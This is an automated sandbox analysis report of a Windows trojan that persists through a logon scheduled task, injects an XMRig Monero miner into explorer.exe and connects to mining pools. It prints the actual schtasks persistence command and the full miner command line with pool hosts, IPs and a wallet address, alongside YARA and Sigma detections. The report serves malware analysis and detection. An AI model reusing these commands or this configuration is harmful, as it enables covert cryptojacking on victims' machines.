Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report pcNCraWcRk

Overview

General Information

Sample Name:pcNCraWcRk (renamed file extension from none to exe)
Analysis ID:513056
MD5:0958fa69ba0e6645c42215c5325d8f76
SHA1:800666827e118ce78aef55c47864512ef9d3b7a6
SHA256:1b0c9f3f22d25cd518e480798ee44e8876107b2d37b2e92997c039d4a6c69db1
Tags:exetrojan
Infos:

Most interesting Screenshot:

Detection

BitCoin Miner Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Yara detected BitCoin Miner
Sigma detected: Xmrig
Writes to foreign memory regions
Found strings related to Crypto-Mining
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Detected Stratum mining protocol
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Creates a thread in another existing process (thread injection)
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Creates driver files
Dropped file seen in connection with other malware
Sigma detected: Conhost Parent Process Executions
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • pcNCraWcRk.exe (PID: 1380 cmdline: 'C:\Users\user\Desktop\pcNCraWcRk.exe' MD5: 0958FA69BA0E6645C42215C5325D8F76)
    • conhost.exe (PID: 612 cmdline: 'C:\Windows\System32\conhost.exe' 'C:\Users\user\Desktop\pcNCraWcRk.exe' MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 4564 cmdline: 'cmd' /c schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 6456 cmdline: schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe' MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
      • cmd.exe (PID: 5140 cmdline: 'cmd' cmd /c 'C:\Users\user\AppData\Local\Temp\services64.exe' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • services64.exe (PID: 6756 cmdline: C:\Users\user\AppData\Local\Temp\services64.exe MD5: 0958FA69BA0E6645C42215C5325D8F76)
          • conhost.exe (PID: 5952 cmdline: 'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe' MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • explorer.exe (PID: 6784 cmdline: C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100 MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • services64.exe (PID: 3496 cmdline: C:\Users\user\AppData\Local\Temp\services64.exe MD5: 0958FA69BA0E6645C42215C5325D8F76)
    • conhost.exe (PID: 5252 cmdline: 'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe' MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • sihost64.exe (PID: 5264 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe' MD5: 2497F634A80476AE2EAE956D8B84528E)
        • conhost.exe (PID: 5932 cmdline: 'C:\Windows\System32\conhost.exe' '/sihost64' MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • explorer.exe (PID: 6764 cmdline: C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100 MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000012.00000000.782826325.0000000140753000.00000040.00000001.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    00000011.00000000.728856594.0000000140753000.00000040.00000001.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      00000011.00000000.723918666.0000000140753000.00000040.00000001.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        00000012.00000000.728904022.0000000140753000.00000040.00000001.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          00000009.00000002.847002769.000002C950221000.00000004.00000001.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            Click to see the 106 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            17.0.explorer.exe.140000000.12.unpackPUA_WIN_XMRIG_CryptoCoin_Miner_Dec20Detects XMRIG crypto coin minersFlorian Roth
            • 0x4d6674:$x1: xmrig.exe
            • 0x4d6560:$x2: xmrig.com
            • 0x4d6638:$x2: xmrig.com
            17.0.explorer.exe.140000000.12.unpackPUA_Crypto_Mining_CommandLine_Indicators_Oct21Detects command line parameters often used by crypto mining softwareFlorian Roth
            • 0x457915:$s01: --cpu-priority=
            • 0x45726d:$s05: --nicehash
            17.0.explorer.exe.140000000.12.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
            • 0x4617f1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
            17.0.explorer.exe.140000000.12.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
              17.0.explorer.exe.140000000.2.unpackPUA_WIN_XMRIG_CryptoCoin_Miner_Dec20Detects XMRIG crypto coin minersFlorian Roth
              • 0x4d6674:$x1: xmrig.exe
              • 0x4d6560:$x2: xmrig.com
              • 0x4d6638:$x2: xmrig.com
              Click to see the 192 entries

              Sigma Overview

              Bitcoin Miner:

              barindex
              Sigma detected: XmrigShow sources
              Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100 , CommandLine: C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100 , CommandLine|base64offset|contains: "+~~), Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: 'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe', ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 5952, ProcessCommandLine: C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100 , ProcessId: 6784

              System Summary:

              barindex
              Sigma detected: Conhost Parent Process ExecutionsShow sources
              Source: Process startedAuthor: omkar72: Data: Command: 'cmd' /c schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe', CommandLine: 'cmd' /c schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: 'C:\Windows\System32\conhost.exe' 'C:\Users\user\Desktop\pcNCraWcRk.exe', ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 612, ProcessCommandLine: 'cmd' /c schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe', ProcessId: 4564

              Jbx Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Multi AV Scanner detection for submitted fileShow sources
              Source: pcNCraWcRk.exeVirustotal: Detection: 64%Perma Link
              Source: pcNCraWcRk.exeMetadefender: Detection: 31%Perma Link
              Source: pcNCraWcRk.exeReversingLabs: Detection: 81%
              Antivirus / Scanner detection for submitted sampleShow sources
              Source: pcNCraWcRk.exeAvira: detected
              Multi AV Scanner detection for domain / URLShow sources
              Source: xmr.givemexyz.inVirustotal: Detection: 15%Perma Link
              Antivirus detection for dropped fileShow sources
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeAvira: detection malicious, Label: TR/Agent.ywcqa
              Source: C:\Users\user\AppData\Local\Temp\services64.exeAvira: detection malicious, Label: TR/Agent.wbqui
              Multi AV Scanner detection for dropped fileShow sources
              Source: C:\Users\user\AppData\Local\Temp\services64.exeVirustotal: Detection: 64%Perma Link
              Source: C:\Users\user\AppData\Local\Temp\services64.exeMetadefender: Detection: 31%Perma Link
              Source: C:\Users\user\AppData\Local\Temp\services64.exeReversingLabs: Detection: 81%
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeMetadefender: Detection: 48%Perma Link
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeReversingLabs: Detection: 82%

              Bitcoin Miner:

              barindex
              Yara detected Xmrig cryptocurrency minerShow sources
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.conhost.exe.2c960a01248.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.conhost.exe.2c960f01280.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.conhost.exe.2c960f01280.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.conhost.exe.2c960a01248.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000012.00000000.782826325.0000000140753000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.728856594.0000000140753000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.723918666.0000000140753000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000000.728904022.0000000140753000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.847002769.000002C950221000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000000.744667827.0000000140753000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.726457226.0000000140753000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.849031612.000002C960EA6000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.732288392.000002A7830D1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.712169070.0000000140000000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.719362766.0000000140753000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000000.825932798.0000000140753000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000000.713121937.0000000140000000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000000.715770261.0000000140000000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000000.769937970.0000000140000000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.724751295.0000000140000000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000000.724515509.0000000140000000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000000.704591182.0000000140000000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.717951007.0000000140000000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000003.719582086.000002A79BBD0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.704736312.0000000140000000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.713985115.0000000140000000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.708825337.0000000140000000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.716519488.0000000140000000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.706517358.0000000140000000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.721988497.0000000140000000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000000.797286728.0000000140000000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000000.727173943.0000000140000000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000000.729811300.0000000140000000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.709450089.000002C968F90000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.717098920.000002C968F90000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.702282973.0000000140000000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000000.721557142.0000000140000000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.710365911.0000000140000000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.708284013.000002C968F90000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000000.710976279.0000000140000000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000000.706240409.0000000140000000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.847850368.000002C9604A6000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 5252, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 5952, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 6784, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 6764, type: MEMORYSTR
              Yara detected BitCoin MinerShow sources
              Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 5252, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 5952, type: MEMORYSTR
              Found strings related to Crypto-MiningShow sources
              Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmpString found in binary or memory: stratum+tcp://
              Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmpString found in binary or memory: cryptonight/0
              Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmpString found in binary or memory: stratum+tcp://
              Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmpString found in binary or memory: -o, --url=URL URL of mining server
              Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
              Source: conhost.exe, 00000009.00000002.847002769.000002C950221000.00000004.00000001.sdmpString found in binary or memory: FileDescriptionXMRig miner.
              Detected Stratum mining protocolShow sources
              Source: global trafficTCP traffic: 192.168.2.4:49763 -> 198.23.214.117:8080 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"","pass":"","agent":"xmrig/6.15.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","astrobwt"]}}.
              Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: conhost.exe, 00000009.00000002.847420069.000002C9505A6000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000000.688676721.000002A7830D1000.00000004.00000001.sdmp, WR64.sys.9.dr

              Networking:

              barindex
              System process connects to network (likely due to code injection or exploit)Show sources
              Source: C:\Windows\explorer.exeNetwork Connect: 198.23.214.117 144
              Source: C:\Windows\explorer.exeDomain query: xmr.givemexyz.in
              Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
              Source: global trafficTCP traffic: 192.168.2.4:49763 -> 198.23.214.117:8080
              Source: conhost.exe, 00000009.00000002.847420069.000002C9505A6000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000000.688676721.000002A7830D1000.00000004.00000001.sdmp, WR64.sys.9.drString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
              Source: conhost.exe, 00000009.00000002.847420069.000002C9505A6000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000000.688676721.000002A7830D1000.00000004.00000001.sdmp, WR64.sys.9.drString found in binary or memory: http://crl.globalsign.net/Root.crl0
              Source: conhost.exe, 00000009.00000002.847420069.000002C9505A6000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000000.688676721.000002A7830D1000.00000004.00000001.sdmp, WR64.sys.9.drString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
              Source: conhost.exe, 00000009.00000002.847420069.000002C9505A6000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000000.688676721.000002A7830D1000.00000004.00000001.sdmp, WR64.sys.9.drString found in binary or memory: http://crl.globalsign.net/primobject.crl0
              Source: conhost.exe, 00000001.00000002.685200138.0000025F60DC1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, explorer.exe, 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, explorer.exe, 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmpString found in binary or memory: https://xmrig.com/benchmark/%s
              Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, explorer.exe, 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, explorer.exe, 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms
              Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, explorer.exe, 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, explorer.exe, 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmpString found in binary or memory: https://xmrig.com/wizard
              Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, explorer.exe, 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, explorer.exe, 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmpString found in binary or memory: https://xmrig.com/wizard%s
              Source: unknownDNS traffic detected: queries for: xmr.givemexyz.in

              System Summary:

              barindex
              Malicious sample detected (through community Yara rule)Show sources
              Source: 17.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 9.2.conhost.exe.2c960a01248.6.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
